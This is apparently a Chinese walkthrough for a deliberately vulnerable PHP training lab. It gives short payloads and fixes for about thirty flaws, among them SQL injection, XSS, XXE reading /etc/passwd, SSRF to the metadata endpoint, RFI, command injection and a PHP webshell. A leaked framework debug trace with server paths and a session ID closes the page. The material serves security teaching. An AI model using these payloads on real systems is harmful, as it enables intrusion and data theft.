当前位置:首页>php>PHP-Code-Sec通关教程,抽30天好靶场会员福利!

PHP-Code-Sec通关教程,抽30天好靶场会员福利!

  • 2026-07-01 10:12:08
PHP-Code-Sec通关教程,抽30天好靶场会员福利!

PHP-Code-Sec通关教程(Writeup)

仅用于安全学习。所有示例均为演示漏洞,切勿在生产环境或未经授权环境使用。

靶场搭建教程

前置说明

  • 默认数据库用户 admin/admin123(MD5 存储),guest/guest
  • 安装完成后访问首页,逐个模块练习。

SQL 注入(modules/sqli/index.php)

  • 数字型:id=1 OR 1=1 可返回所有用户信息。
  • 字符型:q=admin' OR '1'='1 绕过用户名精确匹配。
  • 登录绕过(login.php):用户名 admin,密码 "' OR '1'='1",拼接语句命中。
  • 修复要点:使用预编译(PDO prepare/bind)、最小权限账户、关闭错误回显、统一过滤输出。

XSS(modules/xss/)

  • 反射型:访问 reflected.php?q=<script>alert(1)</script> 即弹窗。
  • 存储型:在 stored.php 留言处提交 <img src=x onerror=alert(1)>,再次加载列表触发。
  • DOM 型:在 dom.php#<svg onload=alert(1)>,由 JS 将 hash 注入到 innerHTML 触发。
  • 修复要点:输出时用 htmlspecialchars;对富文本采用白名单过滤;前端避免直接 innerHTML;开启 CSP。

CSRF(modules/csrf/change_email.php)

  • 登录后访问该页,通过 GET 参数即可改邮箱:?email=attacker@evil.com
  • 制作恶意页面嵌入 <img src="http://target/modules/csrf/change_email.php?email=evil@evil.com"> 即可跨站触发。
  • 修复要点:校验 CSRF Token、限制敏感操作为 POST、SameSite Cookie、双因子校验。

文件上传绕过(modules/upload/index.php)

  • 仅检查扩展名,可用双扩展:shell.php.jpg
  • 若服务端解析误配或结合文件包含可进一步 RCE。
  • 修复要点:强校验 MIME 与内容、随机文件名、存储到非可执行目录、图片库解码二次校验。

文件包含 LFI/RFI(modules/fi/index.php)

  • LFI:使用 page=../../data/notes.txt 绕过路径,读取任意文件(演示目录内)。
  • RFI:若 allow_url_include=On 可尝试 page=http://yourhost/payload.txt
  • 修复要点:严格白名单/映射、禁用远程包含、路径归一化与限制根目录。

路径遍历(modules/path/index.php)

  • file=../core/init.php 可读取源码。
  • 修复要点:限制目录、拒绝 ..、仅允许固定文件名或ID。

命令注入(modules/command/index.php)

  • Windows 示例:host=127.0.0.1 & calc 注入系统命令。
  • 修复要点:使用安全API(如 ping 库或禁用系统调用)、严格白名单、转义与拆分参数。

SSRF(modules/ssrf/index.php)

  • 请求任意URL:url=http://127.0.0.1/ 或云环境 http://169.254.169.254/(如可访问)。
  • 修复要点:禁止访问内网/环回、协议白名单与域名白名单、超时与响应大小限制。

不安全反序列化(modules/unserialize/index.php)

  • 构造:O:4:"Evil":1:{s:3:"cmd";s:8:"calc.exe";} 触发 __destruct
  • 修复要点:拒绝反序列化不可信数据,使用 JSON;如必须,启用允许类白名单、禁用危险魔术方法。

PHAR 对象注入(modules/phar/index.php)

  • 若代码对 phar:// 路径使用 getimagesize() 等函数,PHAR 元数据内置对象可自动反序列化。
  • 测试:准备含恶意对象元数据的 evil.phar,访问 path=phar:///绝对路径/evil.phar/test.jpg
  • 修复要点:拒绝处理不可信 phar、仅处理真实图片文件、禁用自动反序列化。

开放重定向(modules/redirect/index.php)

  • to=https://evil.com/ 直接跳转,易钓鱼。
  • 修复要点:限制跳转到站内路径、加入签名或白名单校验。

邮件头注入(modules/mail/index.php)

  • from 字段可注入 CRLF:noreply@example.com\r\nBCC: attacker@evil.com
  • 修复要点:校验邮件头、拒绝控制字符、使用安全邮件库。

弱加密与弱随机(modules/crypto/index.php)

  • 使用 md5 + rand 生成令牌,容易预测。
  • 修复要点:使用 random_bytes/openssl_random_pseudo_bytes 等强随机,令牌长度足够。

权限逻辑漏洞(modules/auth/index.php)

  • ?admin=1 即显示敏感信息,完全依赖参数。
  • 修复要点:后端基于会话角色校验,严禁信任前端参数。

会话固定(modules/session/demo_login.php & login.php)

  • 登录后不 session_regenerate_id(true),攻击者可预设会话。
  • 修复要点:登录成功后立即 regenerate,设置 HttpOnly 与 SameSite Cookie。

XXE(modules/xxe/index.php)

  • 读取本地文件(Linux):
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><data>&xxe;</data>
  • 读取 Windows 文件:file:///C:/Windows/win.ini
  • 修复要点:禁用外部实体解析,使用 LIBXML_NONET 并关闭 DTD;改用安全解析器。

RCE(modules/rce/eval.php)

  • 演示:在文本框输入 echo system('whoami'); 或 phpinfo(); 即执行。
  • 修复要点:绝不对不可信输入使用 eval/assert,采用白名单逻辑与安全 API。

JWT 弱校验(modules/jwt/index.php)

  • 构造 alg=none 的 JWT:头 {"alg":"none","typ":"JWT"},载荷可设置 {"user":"admin"},签名留空。
  • 或伪造签名时仍被接受。
  • 修复要点:强制指定算法并验证签名与密钥,拒绝 none 算法。

IDOR 越权(modules/idor/user.php)

  • 登录后访问 ?id=2 即可读取他人信息。
  • 修复要点:后端基于会话身份做所有权与权限校验(对象级访问控制)。

CORS 误配置(modules/cors/index.php)

  • 接口反射任意 Origin 并启用 Allow-Credentials,可在恶意站点跨域读取含敏感字段的响应。
  • 修复要点:仅允许可信白名单域名,Allow-Credentials=true 时不得使用 *,避免反射来源。

参数污染 HPP(modules/hpp/index.php)

  • 示例:price=999&price=1 覆盖价格;role=user&role=admin 提升角色。
  • 修复要点:统一参数解析策略、拒绝重复同名参数、严格类型与边界校验。

任意文件写入(modules/write/index.php)

  • 写入 WebShell:路径 ../../webshell.php,内容 <?php system($_GET['cmd']); ?>,之后访问 webshell.php?cmd=whoami
  • 修复要点:限制写入目录到沙箱、固定文件名/扩展、校验内容与权限、最小化文件系统操作。

phpinfo 泄露(modules/phpinfo/index.php)

  • 暴露服务器版本、扩展、路径、环境变量等敏感信息。
  • 修复要点:生产环境移除调试页面,必要时通过鉴权严格限制。

Host Header 注入(modules/host/index.php)

  • 构造的密码重置链接依赖 HTTP_HOST,可通过伪造 Host 头注入恶意域名并钓鱼。
  • 修复要点:生成链接时使用配置的可信主域名,token 加签与有效期校验。

订单逻辑漏洞(modules/logic/order.php)

  • 前端传入的价格可被任意篡改,后端未做校验。
  • 修复要点:后端依据数据库商品价格与用户权益计算金额,拒绝前端价格参数。

点击劫持(modules/clickjack/target.php & modules/clickjack/evil.html)

  • 目标页未设置 X-Frame-Options 或 CSP frame-ancestors,可被第三方页面以透明 iframe 覆盖按钮诱导点击。
  • 演示:打开恶意页 evil.html,点击“立即领取”实际触发目标页敏感按钮。
  • 修复要点:设置 X-Frame-Options: DENY/SAMEORIGIN 或 CSP frame-ancestors 'none' / <可信域>;对关键操作加入二次确认。

弱类型比较与魔法哈希(modules/typing/index.php)

  • 使用 == 比较时,"0e..." 字符串被视作科学计数法的数字 0,导致与其它 0e... 比较相等;md5('QNKCDZO') 等“魔法哈希”可绕过。
  • 演示:输入 token 0e999999999 或密码 QNKCDZO,观察验证结果。
  • 修复要点:使用 === 严格比较;对于哈希比较使用固定时长的常量时间比较;避免依赖弱哈希。

通关建议

  • 每个模块先尝试基础 payload,再推演到更复杂情形(联合注入、二次注入、文件上传联动文件包含等)。
  • 结合浏览器插件或 Burp Suite 等工具进行拦截与修改请求。

参考

  • OWASP Cheat Sheet Series
  • PHP 官方手册(安全相关章节)
  • DVWA / Pikachu 项目结构与练习方式

变量覆盖(extract)(modules/override/index.php)

  • 现象:通过 extract($_GET) 导入参数到当前作用域,EXTR_OVERWRITE 默认覆盖同名变量,导致后端关键变量(如 is_adminrole)被用户输入替换。
  • 体验:访问 ?is_admin=1&role=admin,观察权限从普通用户变为管理员。
  • 修复要点:避免使用 extract(),使用白名单映射赋值;统一读取请求参数后做类型与范围校验;关键变量不可被外部覆盖。

XPath 注入(modules/xpath/index.php)

  • 现象:将输入直接拼接到 XPath 表达式(如 //user[name='$q']),可通过闭合与追加路径语法选择更敏感的节点或绕过条件。
  • 体验:q=alice'] | //user[role='admin,使查询包含管理员节点,从而读取 secret
  • 修复要点:避免字符串拼接,采用参数化/安全 API;对输入做白名单(仅允许合法用户名字符集);结果集二次按角色权限过滤。

正则 ReDoS(modules/redos/index.php)

  • 现象:含嵌套量词与可回溯的模式在特定输入上产生灾难性回溯,CPU 占用飙升(拒绝服务)。
  • 体验:模式 ^(a+)+$ 对输入 aaaa...b(一长串 a 后接 b)会显著耗时。
  • 修复要点:避免嵌套量词;使用原子分组/占有量词降低回溯;限制输入长度与正则复杂度;加入执行超时与隔离策略。

PHP 流包装器信息泄露(modules/wrapper/index.php)

  • 现象:未限制路径或包装器前缀时,php://filter/convert.base64-encode/resource= 可读取并展示源码,泄露敏感逻辑与凭据。
  • 体验:读取 index.php 或 core/init.php 源码,观察到配置信息与实现细节。
  • 修复要点:路径白名单与扩展限制;拒绝 php://phar://data:// 等包装器;关闭错误信息与目录索引。

LDAP 注入(modules/ldap/index.php)

  • 现象:输入直接拼接到 LDAP 过滤器,如 (|(uid=$u)(mail=$u@example.com)),通过特殊语法扩展检索范围,获取更敏感条目(如管理员)。
  • 体验:u=*)(|(role=admin))(,模拟结果包含管理员记录。
  • 修复要点:严格白名单输入,拒绝 * ( ) | & 等特殊符;使用参数化接口/统一转义;结果集再按权限过滤。

Web 缓存投毒与欺骗(modules/cache/index.php)

  • 现象:缓存键未包含影响响应的参数/头部(如 promoUser-Agent),导致动态内容被缓存并提供给其他用户(投毒)。
  • 体验:对同一 page 写入不同 promo,观察同一缓存槽位被污染,其他用户看到恶意内容。
  • 修复要点:将影响响应的参数/头纳入缓存键(Vary);对动态页面禁用缓存或细粒度缓存;设置正确 Content-Type 与路由,避免静态化欺骗。

二次解析(双重解码)(modules/doubleparse/index.php)

  • 现象:网关/服务器一次解码 + 应用层二次解码还原危险序列(如 ../),绕过校验与路径限制,造成路径穿越读取。
  • 体验:file=..%252F..%252Fcore%252Finit.php 经过两次解码变成 ../../core/init.php 并被拼接读取。
  • 修复要点:统一并仅一次解码;路径规范化(realpath)与前缀校验;白名单文件名/扩展与目录限制。
第一届好靶场综合赛

转发推文即可参与抽奖

-END-

最新文章

随机文章

基本 文件 流程 错误 SQL 调试
  1. 请求信息 : 2026-07-03 08:11:12 HTTP/2.0 GET : https://f.mffb.com.cn/a/497265.html
  2. 运行时间 : 0.154358s [ 吞吐率:6.48req/s ] 内存消耗:4,788.48kb 文件加载:140
  3. 缓存信息 : 0 reads,0 writes
  4. 会话信息 : SESSION_ID=fbc45e4a54812d2bb05aba96949134e2
  1. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/public/index.php ( 0.79 KB )
  2. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/autoload.php ( 0.17 KB )
  3. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_real.php ( 2.49 KB )
  4. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/platform_check.php ( 0.90 KB )
  5. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/ClassLoader.php ( 14.03 KB )
  6. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_static.php ( 4.90 KB )
  7. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper.php ( 8.34 KB )
  8. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/helper.php ( 2.19 KB )
  9. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/helper.php ( 1.47 KB )
  10. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/stubs/load_stubs.php ( 0.16 KB )
  11. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Exception.php ( 1.69 KB )
  12. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Facade.php ( 2.71 KB )
  13. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/deprecation-contracts/function.php ( 0.99 KB )
  14. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap.php ( 8.26 KB )
  15. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap80.php ( 9.78 KB )
  16. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/Resources/functions/dump.php ( 1.49 KB )
  17. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-dumper/src/helper.php ( 0.18 KB )
  18. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/VarDumper.php ( 4.30 KB )
  19. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/App.php ( 15.30 KB )
  20. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Container.php ( 15.76 KB )
  21. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/container/src/ContainerInterface.php ( 1.02 KB )
  22. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/provider.php ( 0.19 KB )
  23. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Http.php ( 6.04 KB )
  24. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Str.php ( 7.29 KB )
  25. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Env.php ( 4.68 KB )
  26. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/common.php ( 0.03 KB )
  27. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/helper.php ( 18.78 KB )
  28. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Config.php ( 5.54 KB )
  29. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/app.php ( 0.95 KB )
  30. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cache.php ( 0.78 KB )
  31. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/console.php ( 0.23 KB )
  32. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cookie.php ( 0.56 KB )
  33. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/database.php ( 2.48 KB )
  34. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Env.php ( 1.67 KB )
  35. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/filesystem.php ( 0.61 KB )
  36. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/lang.php ( 0.91 KB )
  37. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/log.php ( 1.35 KB )
  38. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/middleware.php ( 0.19 KB )
  39. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/route.php ( 1.89 KB )
  40. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/session.php ( 0.57 KB )
  41. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/trace.php ( 0.34 KB )
  42. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/view.php ( 0.82 KB )
  43. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/event.php ( 0.25 KB )
  44. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Event.php ( 7.67 KB )
  45. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/service.php ( 0.13 KB )
  46. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/AppService.php ( 0.26 KB )
  47. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Service.php ( 1.64 KB )
  48. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Lang.php ( 7.35 KB )
  49. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/lang/zh-cn.php ( 13.70 KB )
  50. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/Error.php ( 3.31 KB )
  51. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/RegisterService.php ( 1.33 KB )
  52. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/services.php ( 0.14 KB )
  53. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/PaginatorService.php ( 1.52 KB )
  54. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ValidateService.php ( 0.99 KB )
  55. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ModelService.php ( 2.04 KB )
  56. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Service.php ( 0.77 KB )
  57. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Middleware.php ( 6.72 KB )
  58. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/BootService.php ( 0.77 KB )
  59. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Paginator.php ( 11.86 KB )
  60. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/Validate.php ( 63.20 KB )
  61. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Model.php ( 23.55 KB )
  62. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Attribute.php ( 21.05 KB )
  63. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/AutoWriteData.php ( 4.21 KB )
  64. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Conversion.php ( 6.44 KB )
  65. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/DbConnect.php ( 5.16 KB )
  66. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/ModelEvent.php ( 2.33 KB )
  67. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/RelationShip.php ( 28.29 KB )
  68. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Arrayable.php ( 0.09 KB )
  69. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Jsonable.php ( 0.13 KB )
  70. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/contract/Modelable.php ( 0.09 KB )
  71. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Db.php ( 2.88 KB )
  72. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/DbManager.php ( 8.52 KB )
  73. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Log.php ( 6.28 KB )
  74. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Manager.php ( 3.92 KB )
  75. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerTrait.php ( 2.69 KB )
  76. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerInterface.php ( 2.71 KB )
  77. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cache.php ( 4.92 KB )
  78. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/simple-cache/src/CacheInterface.php ( 4.71 KB )
  79. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Arr.php ( 16.63 KB )
  80. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/driver/File.php ( 7.84 KB )
  81. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/Driver.php ( 9.03 KB )
  82. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/CacheHandlerInterface.php ( 1.99 KB )
  83. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/Request.php ( 0.09 KB )
  84. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Request.php ( 55.78 KB )
  85. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/middleware.php ( 0.25 KB )
  86. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Pipeline.php ( 2.61 KB )
  87. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/TraceDebug.php ( 3.40 KB )
  88. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/middleware/SessionInit.php ( 1.94 KB )
  89. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Session.php ( 1.80 KB )
  90. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/driver/File.php ( 6.27 KB )
  91. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/SessionHandlerInterface.php ( 0.87 KB )
  92. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/Store.php ( 7.12 KB )
  93. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Route.php ( 23.73 KB )
  94. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleName.php ( 5.75 KB )
  95. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Domain.php ( 2.53 KB )
  96. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleGroup.php ( 22.43 KB )
  97. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Rule.php ( 26.95 KB )
  98. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleItem.php ( 9.78 KB )
  99. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/route/app.php ( 1.72 KB )
  100. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Route.php ( 4.70 KB )
  101. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/dispatch/Controller.php ( 4.74 KB )
  102. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Dispatch.php ( 10.44 KB )
  103. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/controller/Index.php ( 4.81 KB )
  104. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/BaseController.php ( 2.05 KB )
  105. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/facade/Db.php ( 0.93 KB )
  106. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/connector/Mysql.php ( 5.44 KB )
  107. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/PDOConnection.php ( 52.47 KB )
  108. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Connection.php ( 8.39 KB )
  109. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/ConnectionInterface.php ( 4.57 KB )
  110. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/builder/Mysql.php ( 16.58 KB )
  111. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Builder.php ( 24.06 KB )
  112. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseBuilder.php ( 27.50 KB )
  113. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Query.php ( 15.71 KB )
  114. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseQuery.php ( 45.13 KB )
  115. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TimeFieldQuery.php ( 7.43 KB )
  116. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/AggregateQuery.php ( 3.26 KB )
  117. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ModelRelationQuery.php ( 20.07 KB )
  118. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ParamsBind.php ( 3.66 KB )
  119. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ResultOperation.php ( 7.01 KB )
  120. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/WhereQuery.php ( 19.37 KB )
  121. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/JoinAndViewQuery.php ( 7.11 KB )
  122. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TableFieldInfo.php ( 2.63 KB )
  123. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/Transaction.php ( 2.77 KB )
  124. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/driver/File.php ( 5.96 KB )
  125. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/LogHandlerInterface.php ( 0.86 KB )
  126. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/Channel.php ( 3.89 KB )
  127. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/event/LogRecord.php ( 1.02 KB )
  128. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/Collection.php ( 16.47 KB )
  129. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/View.php ( 1.70 KB )
  130. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/View.php ( 4.39 KB )
  131. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Response.php ( 8.81 KB )
  132. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/response/View.php ( 3.29 KB )
  133. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cookie.php ( 6.06 KB )
  134. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-view/src/Think.php ( 8.38 KB )
  135. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/TemplateHandlerInterface.php ( 1.60 KB )
  136. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/Template.php ( 46.61 KB )
  137. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/driver/File.php ( 2.41 KB )
  138. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/contract/DriverInterface.php ( 0.86 KB )
  139. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/runtime/temp/067d451b9a0c665040f3f1bdd3293d68.php ( 11.98 KB )
  140. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Html.php ( 4.42 KB )
  1. CONNECT:[ UseTime:0.000626s ] mysql:host=127.0.0.1;port=3306;dbname=f_mffb;charset=utf8mb4
  2. SHOW FULL COLUMNS FROM `fenlei` [ RunTime:0.000854s ]
  3. SELECT * FROM `fenlei` WHERE `fid` = 0 [ RunTime:0.000272s ]
  4. SELECT * FROM `fenlei` WHERE `fid` = 63 [ RunTime:0.000288s ]
  5. SHOW FULL COLUMNS FROM `set` [ RunTime:0.000647s ]
  6. SELECT * FROM `set` [ RunTime:0.000225s ]
  7. SHOW FULL COLUMNS FROM `article` [ RunTime:0.000707s ]
  8. SELECT * FROM `article` WHERE `id` = 497265 LIMIT 1 [ RunTime:0.001961s ]
  9. UPDATE `article` SET `lasttime` = 1783037472 WHERE `id` = 497265 [ RunTime:0.010001s ]
  10. SELECT * FROM `fenlei` WHERE `id` = 64 LIMIT 1 [ RunTime:0.001091s ]
  11. SELECT * FROM `article` WHERE `id` < 497265 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.013335s ]
  12. SELECT * FROM `article` WHERE `id` > 497265 ORDER BY `id` ASC LIMIT 1 [ RunTime:0.007338s ]
  13. SELECT * FROM `article` WHERE `id` < 497265 ORDER BY `id` DESC LIMIT 10 [ RunTime:0.000745s ]
